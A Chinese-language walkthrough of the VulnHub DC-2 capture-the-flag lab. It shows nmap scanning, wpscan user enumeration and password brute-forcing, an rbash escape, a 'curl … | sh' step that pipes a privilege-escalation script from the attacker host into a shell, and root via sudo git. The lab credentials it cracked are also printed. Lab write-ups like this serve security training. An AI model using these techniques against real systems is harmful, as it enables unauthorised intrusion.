渗透测试 - DC-2 - 练习篇

admin 2024年12月11日22:41:03评论5 views字数 3082阅读10分16秒阅读模式

渗透测试 - DC-2 - 练习篇  

描述

与 DC-1 非常相似,DC-2 是另一个专门建造的易受攻击实验室,目的是获得渗透测试领域的经验。

与最初的 DC-1 一样,它的设计考虑到了初学者

必须具备 Linux 技能和熟悉 Linux 命令行,以及具备一些基本渗透测试工具的经验。

就像 DC-1 一样,有五个标志,包括最后一个标志。

再说一次,就像 DC-1 一样,这些标志对初学者很重要,但对有经验的人来说并不那么重要。

简而言之,唯一真正重要的标志是最后一面旗帜。

对于初学者来说,Google 是您的朋友。嗯,除了所有的隐私问题等。

我还没有探索实现 root 的所有方法,因为我放弃了我一直在努力的上一个版本,除了基本操作系统安装之外,我完全从头开始。

官网下载地址:https://www.vulnhub.com/entry/dc-2,311/

下载完成之后解压用vm虚拟机打开镜像,打开之后把桥接改成NAT就可以了。然后开机开搞

渗透测试 - DC-2 - 练习篇
渗透测试 - DC-2 - 练习篇
过程思路
信息收集IP地址探测
nmap 192.168.40.0/24
渗透测试 - DC-2 - 练习篇
看到有5个IP,146是目标机的IP
攻击机:192.168.40.130
目标机:192.168.40.146
扫描一下目标机的开放端口服务
nmap -A -sV -T4 -p192.168.40.146
渗透测试 - DC-2 - 练习篇
一个http的一个ssh的,先试一下http的,直接浏览器访问一下,发现报错,会跳转到www.dc-2.com,这里是因为它做了重定向,我们把hosts文件加个域名解析就好了
渗透测试 - DC-2 - 练习篇
渗透测试 - DC-2 - 练习篇
渗透测试 - DC-2 - 练习篇
再用浏览器访问一下192.168.40.146,出web页面了
渗透测试 - DC-2 - 练习篇
打这种靶机特别是要找flag的很容易打着打着就忽略掉了,我建议就是每次遇到这种界面,都先用ctrl+f查找一下flag看看有没有
渗透测试 - DC-2 - 练习篇
flag提示用cewl,Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。用cewl把这个页面上面的东西爬下来做成字典
cewl http://dc-2/ -w passwd.txt
渗透测试 - DC-2 - 练习篇
扫描一下它的网站目录
dirsearch -u http://dc-2/
渗透测试 - DC-2 - 练习篇
出来了几个网址都访问一下,找到登录页面
渗透测试 - DC-2 - 练习篇
这个大大的w,一眼Wordpress(Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,特别是 学校网站 非常爱用,这也导致白帽子都会去跟踪WordPress的安全漏洞,Wordpress自诞生起也出现了很多漏洞。Wordpress还可以使用 插件 、 主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件,主题的漏洞去渗透Wordpress站点,于是WPScan应运而生,收集Wordpress的各种漏洞,形成一个Wordpress专用扫描器)
知道是Wordpress,那肯定是有工具的WPScan (WPScan是 Kali Linux默认自带 的一款 漏洞扫描工具 ,它采用 Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括 主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。)
一般来说kali都是带这个工具的如果没有也没事,下面是安装方法
apt install wpscan 
渗透测试 - DC-2 - 练习篇
安装好之后
渗透测试 - DC-2 - 练习篇

wpscan使用方法

渗透测试 - DC-2 - 练习篇
–version| 显示WPScan的版本信息-| 输出文件到指定位置-| 指定文件输出的格式user-agent| 使用指定的ua头–random-user-agent | 使用随机UA头–max-threads| 最大线程数,默认最大线程为5–proxy | 加载代理update| 更新漏洞库–force| 不检测目标是否在运行wordpress–api-token | 使用token用于显示漏洞信息–wp-content DIR| 自定义指定检测内容–cookie | 指定cookievp | 结果中显示有漏洞的插件ap | 结果中显示目标的所有插件vt | 结果中显示存在漏洞的主题at| 结果中显示所有主题tt| 列举缩略图相关的文件–enumerate/-e| 枚举 option| 枚举用户名p| 枚举插件t| 枚举主题

用WPScan枚举一下它的用户名,如果一次不出来就仔细检查一下是什么原因,不要一直爆,因为我们是免费的每天有使用次数用完就没了

wpscan --url http://dc-2/ -e u
渗透测试 - DC-2 - 练习篇

出来了3个用户名,把爆出来的用户名放到文件里,开始爆破密码

渗透测试 - DC-2 - 练习篇
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
渗透测试 - DC-2 - 练习篇

出来了两个账户和密码,Jerry/adipiscing ,tom/parturient,登录一下看看

渗透测试 - DC-2 - 练习篇

登录成功,又开始找东西了,直接开查找看flag

渗透测试 - DC-2 - 练习篇

flag2提示说不能利用Wordpress走捷径,这里我猜的是里面应该有文件上传但是提示说不能走捷径,另外一条路可能就是7744端口的ssh了,用ssh登录一下,tom/parturient这个用户登录成功了

ssh tom@192.168.40.146 -p 7744
渗透测试 - DC-2 - 练习篇

查看目录文件看到了flag3,但是我查看的时候被rbash阻止了,直接看usr里面的内容,发现只有这几个命令可以用

渗透测试 - DC-2 - 练习篇

cat查看用不了我用别的,我用vi编辑,看到了里面的内容

vi flag3.txt
渗透测试 - DC-2 - 练习篇
得到flag3提示提到了tom用户和jerry,这里应该是想让我绕过rbash查看jerry用户,只有这几个命令试一下绕过rbash
BASH_CMDS[a]=/bin/sh;a##这行代码的意思是将数组 BASH_CMDS 中下标为 a 的元素设置为 /bin/sh。这意味着 BASH_CMDS[a] 现在保存的是 /bin/sh ,即指向系统默认的 shell;a表示执行
渗透测试 - DC-2 - 练习篇
成功绕过,查看jerry用户的文件,在jerry的用户文件下面找到flag4
渗透测试 - DC-2 - 练习篇
渗透测试 - DC-2 - 练习篇
flag4的提示好像没什么用,到这里可能是要我切到jerry用户去,su也用不了ssh也登录不上,直接去网上找找rbash提权方法
export -p        //查看环境变量BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a/bin/bashexport PATH=$PATH:/bin/         //添加环境变量export PATH=$PATH:/usr/bin      //添加环境变量
渗透测试 - DC-2 - 练习篇
把自己添加到环境变量里面去,完成绕过rbash,登录Jerry/adipiscing
渗透测试 - DC-2 - 练习篇
找方法提权,用上一篇文章提到的工具什么?你系统提权还要自己找?,快来试试全平台提权辅助工具!!!
curl 192.168.40.130:2222/linpeas.sh | sh
渗透测试 - DC-2 - 练习篇
渗透测试 - DC-2 - 练习篇
看到git是黄底红色,这里的意思是用sudo执行git不需要root密码,使用可以直接用git提权
sudo git help config #查看帮助文档!'sh' #按esc输入完成提权! 
渗透测试 - DC-2 - 练习篇
渗透测试 - DC-2 - 练习篇
进入root文件夹查看flag5
渗透测试 - DC-2 - 练习篇
这一台靶机到这里就结束了,这里面用到的知识点
1.重定向2.cewl使用3.wpscan使用4.rbash绕过5.git提权

原文始发于微信公众号(信安一把索):渗透测试 - DC-2 - 练习篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月11日22:41:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试 - DC-2 - 练习篇https://cn-sec.com/archives/3496281.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息